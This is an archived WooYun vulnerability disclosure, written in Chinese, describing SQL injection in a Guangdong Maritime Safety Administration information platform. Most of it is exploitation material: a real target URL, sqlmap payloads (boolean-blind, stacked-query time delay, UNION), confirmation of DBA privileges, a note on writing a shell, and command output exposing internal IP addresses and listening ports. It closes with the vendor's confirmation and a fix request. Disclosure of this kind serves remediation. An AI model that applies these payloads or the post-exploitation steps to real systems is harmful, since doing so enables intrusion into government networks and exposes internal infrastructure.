乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-20: 细节已通知厂商并且等待厂商处理中 2015-06-23: 厂商已经确认,细节仅向厂商公开 2015-07-03: 细节向核心白帽子及相关领域专家公开 2015-07-13: 细节向普通白帽子公开 2015-07-23: 细节向实习白帽子公开 2015-08-07: 细节向公众公开
。。。
广东海事局某信息发布平台存在SQL注入漏洞(威胁内网安全)url:http://183.62.26.194:81/hbxxfb/Childpage/tztginfo.aspx?Pid=d691ecae-42ce-4999-b360-d46982a15dff
Parameter: Pid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Pid=d691ecae-42ce-4999-b360-d46982a15dff' AND 4013=4013 AND 'pGQP'='pGQP Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: Pid=d691ecae-42ce-4999-b360-d46982a15dff';WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: Pid=-5551' UNION ALL SELECT NULL,CHAR(113)+CHAR(98)+CHAR(122)+CHAR(107)+CHAR(113)+CHAR(88)+CHAR(81)+CHAR(81)+CHAR(86)+CHAR(76)+CHAR(72)+CHAR(86)+CHAR(98)+CHAR(122)+CHAR(79)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113),NULL,NULL-- ---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---
current user is DBA: True
交互写shell
---\\ 的用户帐户 ----------------------------------------------------------------------------------command standard output:---Windows IP 配置 以太网适配器 本地连接 4: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 以太网适配器 本地连接 3: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 以太网适配器 本地连接 2: 连接特定的 DNS 后缀 . . . . . . . : 本地链接 IPv6 地址. . . . . . . . : fe80::810a:9c1b:ebc:1de6 IPv4 地址 . . . . . . . . . . . . : 198.28.51.224 子网掩码 . . . . . . . . . . . . : 255.255.255.0 默认网关. . . . . . . . . . . . . : 198.28.51.254 以太网适配器 本地连接: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 隧道适配器 isatap.{31EED92D-D289-4CB6-A969-E95327D9ED35}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 隧道适配器 isatap.{10295A0A-8CA3-41DA-B96B-F976CA22016E}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : ---
开放端口
活动连接 协议 本地地址 外部地址 状态 PID TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 948 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 3516 TCP 0.0.0.0:6005 0.0.0.0:0 LISTENING 1580 TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 668 TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 276 TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 260 TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 728 TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING 720 TCP 0.0.0.0:49157 0.0.0.0:0 LISTENING 3544 TCP 127.0.0.1:1434 0.0.0.0:0 LISTENING 1580 TCP 198.28.51.224:89 0.0.0.0:0 LISTENING 4 TCP 198.28.51.224:139 0.0.0.0:0 LISTENING 4 TCP 198.28.51.224:445 198.28.51.207:49669 ESTABLISHED 4 TCP 198.28.51.224:6005 198.28.51.207:53312 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.207:53313 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.207:53314 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.207:53315 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.207:53316 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.207:53317 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.207:53318 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.207:53319 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.207:53320 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.207:53321 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.207:58450 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.225:49241 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.225:49275 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.248:49492 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.248:50193 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.248:50338 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.248:50752 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.248:51889 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.248:54360 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.248:55884 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.248:59647 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.248:60813 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.248:62175 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.248:63425 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.248:63754 ESTABLISHED 1580 TCP 198.28.51.224:6005 198.28.51.248:64564 ESTABLISHED 1580 TCP 198.28.51.224:8081 0.0.0.0:0 LISTENING 4 TCP 198.28.51.224:49158 198.28.51.225:6005 ESTABLISHED 4012 TCP [::]:80 [::]:0 LISTENING 4 TCP [::]:135 [::]:0 LISTENING 948 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:3389 [::]:0 LISTENING 3516 TCP [::]:6005 [::]:0 LISTENING 1580 TCP [::]:47001 [::]:0 LISTENING 4 TCP [::]:49152 [::]:0 LISTENING 668 TCP [::]:49153 [::]:0 LISTENING 276 TCP [::]:49154 [::]:0 LISTENING 260 TCP [::]:49155 [::]:0 LISTENING 728 TCP [::]:49156 [::]:0 LISTENING 720 TCP [::]:49157 [::]:0 LISTENING 3544 TCP [::1]:1434 [::]:0 LISTENING 1580 TCP [fe80::810a:9c1b:ebc:1de6]:65511 [fe80::34ce:bad3:9719:1e0d]:135 TIME_WAIT 0 TCP [fe80::810a:9c1b:ebc:1de6]:65512 [fe80::34ce:bad3:9719:1e0d]:49246 TIME_WAIT 0 UDP 0.0.0.0:123 *:* 616 UDP 0.0.0.0:500 *:* 260 UDP 0.0.0.0:4500 *:* 260 UDP 0.0.0.0:5355 *:* 1036 UDP 198.28.51.224:137 *:* 4 UDP 198.28.51.224:138 *:* 4 UDP [::]:123 *:* 616 UDP [::]:500 *:* 260
修复注入漏洞
危害等级:高
漏洞Rank:10
确认时间:2015-06-23 11:39
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:高攻击成本:低造成影响:高综合评级为:高,rank:10正在联系相关网站管理单位处置。
暂无